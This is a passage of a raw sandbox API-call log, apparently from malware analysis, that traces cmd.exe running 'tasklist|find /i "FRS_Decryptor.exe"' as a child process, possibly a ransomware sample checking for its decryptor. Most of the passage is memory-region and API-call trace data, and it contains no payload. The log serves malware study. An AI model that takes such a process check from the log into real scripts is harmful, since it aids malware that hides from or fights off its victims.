= 0x348 Thread: id = 352 os_tid = 0x33c Thread: id = 353 os_tid = 0x338 Thread: id = 354 os_tid = 0x334 Thread: id = 355 os_tid = 0x31c Thread: id = 356 os_tid = 0x314 Thread: id = 357 os_tid = 0x2e0 Process: id = "123" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x227bb000" os_pid = "0xbdc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6392 start_va = 0x460000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6393 start_va = 0x480000 end_va = 0x481fff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 6394 start_va = 0x490000 end_va = 0x49efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 6395 start_va = 0x4a0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 6396 start_va = 0x4e0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 6397 start_va = 0x5e0000 end_va = 0x5e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 6398 start_va = 0x5f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 6399 start_va = 0x600000 end_va = 0x601fff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 6400 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 6401 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6402 start_va = 0x7ee20000 end_va = 0x7ee42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ee20000" filename = "" Region: id = 6403 start_va = 0x7ee44000 end_va = 0x7ee44fff entry_point = 0x0 region_type = private name = "private_0x000000007ee44000" filename = "" Region: id = 6404 start_va = 0x7ee4c000 end_va = 0x7ee4efff entry_point = 0x0 region_type = private name = "private_0x000000007ee4c000" filename = "" Region: id = 6405 start_va = 0x7ee4f000 end_va = 0x7ee4ffff entry_point = 0x0 region_type = private name = "private_0x000000007ee4f000" filename = "" Region: id = 6406 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6407 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6408 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6409 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 6410 start_va = 0x710000 end_va = 0x71ffff entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 6411 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6412 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6413 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6414 start_va = 0x460000 end_va = 0x46ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6415 start_va = 0x610000 end_va = 0x68dfff entry_point = 0x610000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6416 start_va = 0x750000 end_va = 0x84ffff entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 6417 start_va = 0x950000 end_va = 0x95ffff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 6418 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6419 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6420 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6421 start_va = 0x7ed20000 end_va = 0x7ee1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ed20000" filename = "" Region: id = 6422 start_va = 0x470000 end_va = 0x473fff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6423 start_va = 0x960000 end_va = 0xc34fff entry_point = 0x960000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6442 start_va = 0x480000 end_va = 0x483fff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Thread: id = 358 os_tid = 0xbd8 [0119.672] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0119.672] __set_app_type (_Type=0x1) [0119.672] __p__fmode () returned 0x76ea1768 [0119.672] __p__commode () returned 0x76ea176c [0119.672] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0119.673] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0119.673] GetCurrentThreadId () returned 0xbd8 [0119.673] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbd8) returned 0x34 [0119.673] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0119.673] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0119.673] SetThreadUILanguage (LangId=0x0) returned 0x409 [0119.675] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0119.675] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x5df9dc | out: phkResult=0x5df9dc*=0x0) returned 0x2 [0119.675] VirtualQuery (in: lpAddress=0x5df9eb, lpBuffer=0x5df984, dwLength=0x1c | out: lpBuffer=0x5df984*(BaseAddress=0x5df000, AllocationBase=0x4e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0119.675] VirtualQuery (in: lpAddress=0x4e0000, lpBuffer=0x5df984, dwLength=0x1c | out: lpBuffer=0x5df984*(BaseAddress=0x4e0000, AllocationBase=0x4e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0119.675] VirtualQuery (in: lpAddress=0x4e1000, lpBuffer=0x5df984, dwLength=0x1c | out: lpBuffer=0x5df984*(BaseAddress=0x4e1000, AllocationBase=0x4e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0119.675] VirtualQuery (in: lpAddress=0x4e3000, lpBuffer=0x5df984, dwLength=0x1c | out: lpBuffer=0x5df984*(BaseAddress=0x4e3000, AllocationBase=0x4e0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0119.675] VirtualQuery (in: lpAddress=0x5e0000, lpBuffer=0x5df984, dwLength=0x1c | out: lpBuffer=0x5df984*(BaseAddress=0x5e0000, AllocationBase=0x5e0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0119.675] GetConsoleOutputCP () returned 0x1b5 [0119.675] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0119.676] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0119.676] _get_osfhandle (_FileHandle=1) returned 0x158 [0119.676] SetConsoleMode (hConsoleHandle=0x158, dwMode=0x0) returned 0 [0119.676] _get_osfhandle (_FileHandle=1) returned 0x158 [0119.676] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0119.676] _get_osfhandle (_FileHandle=0) returned 0x24 [0119.676] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0119.676] GetEnvironmentStringsW () returned 0x7540c0* [0119.676] FreeEnvironmentStringsA (penv="=") returned 1 [0119.676] GetEnvironmentStringsW () returned 0x7540c0* [0119.676] FreeEnvironmentStringsA (penv="=") returned 1 [0119.676] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x5de92c | out: phkResult=0x5de92c*=0x44) returned 0x0 [0119.677] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x5de934, lpData=0x5de938, lpcbData=0x5de930*=0x1000 | out: lpType=0x5de934*=0x0, lpData=0x5de938*=0xb2, lpcbData=0x5de930*=0x1000) returned 0x2 [0119.677] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x5de934, lpData=0x5de938, lpcbData=0x5de930*=0x1000 | out: lpType=0x5de934*=0x4, lpData=0x5de938*=0x1, lpcbData=0x5de930*=0x4) returned 0x0 [0119.677] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x5de934, lpData=0x5de938, lpcbData=0x5de930*=0x1000 | out: lpType=0x5de934*=0x0, lpData=0x5de938*=0x1, lpcbData=0x5de930*=0x1000) returned 0x2 [0119.677] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x5de934, lpData=0x5de938, lpcbData=0x5de930*=0x1000 | out: lpType=0x5de934*=0x4, lpData=0x5de938*=0x0, lpcbData=0x5de930*=0x4) returned 0x0 [0119.677] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x5de934, lpData=0x5de938, lpcbData=0x5de930*=0x1000 | out: lpType=0x5de934*=0x4, lpData=0x5de938*=0x40, lpcbData=0x5de930*=0x4) returned 0x0 [0119.677] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x5de934, lpData=0x5de938, lpcbData=0x5de930*=0x1000 | out: lpType=0x5de934*=0x4, lpData=0x5de938*=0x40, lpcbData=0x5de930*=0x4) returned 0x0 [0119.677] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x5de934, lpData=0x5de938, lpcbData=0x5de930*=0x1000 | out: lpType=0x5de934*=0x0, lpData=0x5de938*=0x40, lpcbData=0x5de930*=0x1000) returned 0x2 [0119.677] RegCloseKey (hKey=0x44) returned 0x0 [0119.677] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x5de92c | out: phkResult=0x5de92c*=0x44) returned 0x0 [0119.677] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x5de934, lpData=0x5de938, lpcbData=0x5de930*=0x1000 | out: lpType=0x5de934*=0x0, lpData=0x5de938*=0x40, lpcbData=0x5de930*=0x1000) returned 0x2 [0119.677] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x5de934, lpData=0x5de938, lpcbData=0x5de930*=0x1000 | out: lpType=0x5de934*=0x4, lpData=0x5de938*=0x1, lpcbData=0x5de930*=0x4) returned 0x0 [0119.677] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x5de934, lpData=0x5de938, lpcbData=0x5de930*=0x1000 | out: lpType=0x5de934*=0x0, lpData=0x5de938*=0x1, lpcbData=0x5de930*=0x1000) returned 0x2 [0119.677] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x5de934, lpData=0x5de938, lpcbData=0x5de930*=0x1000 | out: lpType=0x5de934*=0x4, lpData=0x5de938*=0x0, lpcbData=0x5de930*=0x4) returned 0x0 [0119.677] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x5de934, lpData=0x5de938, lpcbData=0x5de930*=0x1000 | out: lpType=0x5de934*=0x4, lpData=0x5de938*=0x9, lpcbData=0x5de930*=0x4) returned 0x0 [0119.677] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x5de934, lpData=0x5de938, lpcbData=0x5de930*=0x1000 | out: lpType=0x5de934*=0x4, lpData=0x5de938*=0x9, lpcbData=0x5de930*=0x4) returned 0x0 [0119.677] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x5de934, lpData=0x5de938, lpcbData=0x5de930*=0x1000 | out: lpType=0x5de934*=0x0, lpData=0x5de938*=0x9, lpcbData=0x5de930*=0x1000) returned 0x2 [0119.677] RegCloseKey (hKey=0x44) returned 0x0 [0119.677] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa500a2 [0119.677] srand (_Seed=0x5aa500a2) [0119.677] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0119.677] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0119.677] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0119.677] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7540c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0119.678] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0119.678] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0119.678] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0119.678] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.678] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0119.678] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0119.678] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0119.678] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0119.678] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0119.678] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0119.678] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0119.678] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0119.678] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0119.678] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x5df70c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0119.678] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0x5df70c, lpFilePart=0x5df708 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x5df708*="Desktop") returned 0x1c [0119.678] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0119.678] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x5df488 | out: lpFindFileData=0x5df488) returned 0x7542d8 [0119.678] FindClose (in: hFindFile=0x7542d8 | out: hFindFile=0x7542d8) returned 1 [0119.678] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0x5df488 | out: lpFindFileData=0x5df488) returned 0x7542d8 [0119.679] FindClose (in: hFindFile=0x7542d8 | out: hFindFile=0x7542d8) returned 1 [0119.679] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0119.679] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0x5df488 | out: lpFindFileData=0x5df488) returned 0x7542d8 [0119.679] FindClose (in: hFindFile=0x7542d8 | out: hFindFile=0x7542d8) returned 1 [0119.679] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0119.679] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0119.679] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0119.679] GetEnvironmentStringsW () returned 0x756190* [0119.679] FreeEnvironmentStringsA (penv="=") returned 1 [0119.679] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0119.680] GetConsoleOutputCP () returned 0x1b5 [0119.680] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0119.680] GetUserDefaultLCID () returned 0x409 [0119.680] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0119.680] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x5df838, cchData=128 | out: lpLCData="0") returned 2 [0119.680] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x5df838, cchData=128 | out: lpLCData="0") returned 2 [0119.680] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x5df838, cchData=128 | out: lpLCData="1") returned 2 [0119.680] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0119.680] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0119.680] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0119.680] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0119.680] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0119.680] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0119.680] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0119.680] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0119.680] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0119.681] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0119.681] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0119.682] GetConsoleTitleW (in: lpConsoleTitle=0x754e28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0119.682] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0119.682] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0119.682] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0119.682] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0119.683] _wcsicmp (_String1="tasklist", _String2=")") returned 75 [0119.683] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14 [0119.683] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14 [0119.683] _wcsicmp (_String1="IF", _String2="tasklist") returned -11 [0119.683] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11 [0119.683] _wcsicmp (_String1="REM", _String2="tasklist") returned -2 [0119.683] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2 [0119.684] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0119.684] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0119.684] _wcsicmp (_String1="IF", _String2="find") returned 3 [0119.684] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0119.684] _wcsicmp (_String1="REM", _String2="find") returned 12 [0119.684] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0119.685] _pipe (in: _PtHandles=0x7551f0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0x7551f0) returned 0 [0119.685] _dup (_FileHandle=1) returned 5 [0119.685] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0119.685] _close (_FileHandle=4) returned 0 [0119.685] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0119.685] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0119.686] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0119.686] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0119.686] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0119.686] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0119.686] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0119.686] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0119.686] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0119.686] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0119.686] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0119.686] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0119.686] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0119.686] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0119.686] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0119.686] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0119.686] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0119.686] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0119.686] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0119.686] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0119.686] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0119.686] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0119.686] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0119.686] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0119.686] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0119.686] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0119.686] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0119.686] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0119.686] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0119.686] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0119.686] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0119.686] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0119.686] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0119.686] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0119.686] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0119.686] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0119.686] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0119.686] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0119.686] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0119.686] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0119.686] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0119.686] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0119.686] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0119.686] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0119.686] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0119.686] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0119.687] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0119.687] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0119.687] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0119.687] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0119.687] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0119.687] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0119.687] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0119.687] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0119.687] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0119.687] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0119.687] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0119.687] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0119.687] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0119.687] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0119.687] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0119.687] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0119.687] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0119.687] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0119.687] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0119.687] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0119.687] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0119.687] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0119.687] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0119.687] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0119.687] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0119.687] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0119.687] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0119.687] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0119.687] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0119.687] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0119.687] 